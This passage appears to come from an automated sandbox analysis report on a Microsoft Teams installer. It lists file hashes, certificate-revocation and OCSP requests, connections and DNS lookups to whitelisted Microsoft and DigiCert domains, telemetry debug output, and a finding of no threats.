  MD5: F57CCF6F5B9C1E2AAC3C144605B53AA5  SHA256: A92CCAA545B4AF7A81AC10C260291C3C33FB68197D150F8A42D1FBF74EB27648
7080 | Update.exe | C:\Users\admin\AppData\Local\Microsoft\Teams\Update.exe | executable
  MD5: 8F0E958D7EF57D727ADCDA1C67C24C2B  SHA256: 4955CC6E58049EF1E274F340C8425CC55B324278199C92AC0DE87DF05BFAD35D
7080 | Update.exe | C:\Users\admin\AppData\Local\Microsoft\Teams\setup.json | binary
  MD5: F57CCF6F5B9C1E2AAC3C144605B53AA5  SHA256: A92CCAA545B4AF7A81AC10C260291C3C33FB68197D150F8A42D1FBF74EB27648
7056 | MSTeamsSetup_c_l_.exe | C:\Users\admin\AppData\Local\SquirrelTemp\endpoint.json | binary
  MD5: 677CAB9A8B50AD026CFA7625A35DD2D7  SHA256: 07890DDA20815E1E57DCA9553F5DFCFF1B85F4A4369685D4991599E2618978F0
HTTP(S) requests: 7
TCP/UDP connections: 38
DNS requests: 23
Threats: 0

HTTP requests

PID | Process | Method | HTTP code | IP | URL | CN | Reputation (type and size not shown in the report)
3508 | svchost.exe | GET | 200 | 23.216.77.28:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
3508 | svchost.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | whitelisted
(PID/process not shown) | GET | 200 | 184.30.131.245:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | whitelisted
1176 | svchost.exe | GET | 200 | 184.30.131.245:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | whitelisted
2728 | SIHClient.exe | GET | 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | whitelisted
2728 | SIHClient.exe | GET | 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | whitelisted
6456 | backgroundTaskHost.exe | GET | 200 | 2.23.77.188:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D | unknown | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
3508 | svchost.exe | 23.216.77.28:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
4 | System | 192.168.100.255:137 | (no domain shown) | (no ASN shown) | (no CN shown) | whitelisted
3508 | svchost.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
5064 | SearchApp.exe | 104.126.37.131:443 | www.bing.com | Akamai International B.V. | DE | whitelisted
(PID/process not shown) | 184.30.131.245:80 | ocsp.digicert.com | AKAMAI-AS | US | whitelisted
(PID/process not shown) | 20.73.194.208:443 | (no domain shown) | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
4712 | MoUsoCoreWorker.exe | 20.73.194.208:443 | (no domain shown) | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
4 | System | 192.168.100.255:138 | (no domain shown) | (no ASN shown) | (no CN shown) | whitelisted
1076 | svchost.exe | 184.30.18.9:443 | go.microsoft.com | AKAMAI-AS | DE | whitelisted
1176 | svchost.exe | 40.126.32.68:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted

DNS requests

Domain
IP
Reputation
crl.microsoft.com
  • 23.216.77.28
  • 23.216.77.20
whitelisted
www.microsoft.com
  • 184.30.21.171
  • 2.23.246.101
whitelisted
www.bing.com
  • 104.126.37.131
  • 104.126.37.139
whitelisted
google.com
  • 142.250.185.238
whitelisted
ocsp.digicert.com
  • 184.30.131.245
  • 2.23.77.188
whitelisted
go.microsoft.com
  • 184.30.18.9
whitelisted
login.live.com
  • 40.126.32.68
  • 20.190.160.22
  • 20.190.160.17
  • 40.126.32.134
  • 40.126.32.136
  • 40.126.32.133
  • 40.126.32.72
  • 20.190.160.20
whitelisted
teams.live.com
  • 52.113.194.132
whitelisted
statics.teams.cdn.office.net
  • 23.48.23.22
  • 23.48.23.9
whitelisted
settings-win.data.microsoft.com
  • 51.104.136.2
  • 4.231.128.59
whitelisted

Threats

No threats detected
Debug output (process: message)

Update.exe: TelemetryManagerImpl creation started
Update.exe: Update.exe Information: 0 :
Update.exe: Starting TelemetryManager constructor
Update.exe: Update.exe Information: 0 :
Update.exe: Update.exe Information: 0 :
Update.exe: Performance counters are disabled. Skipping creation of counters category.
Update.exe: Update.exe Information: 0 :
Update.exe: RecordBatcherTask with ID 4 started.
Update.exe: Update.exe Information: 0 :
Update.exe: DataPackageSender with UserAgent name: AST-exe-C#, version: 3.3.15.0, [Ast_Default_Source]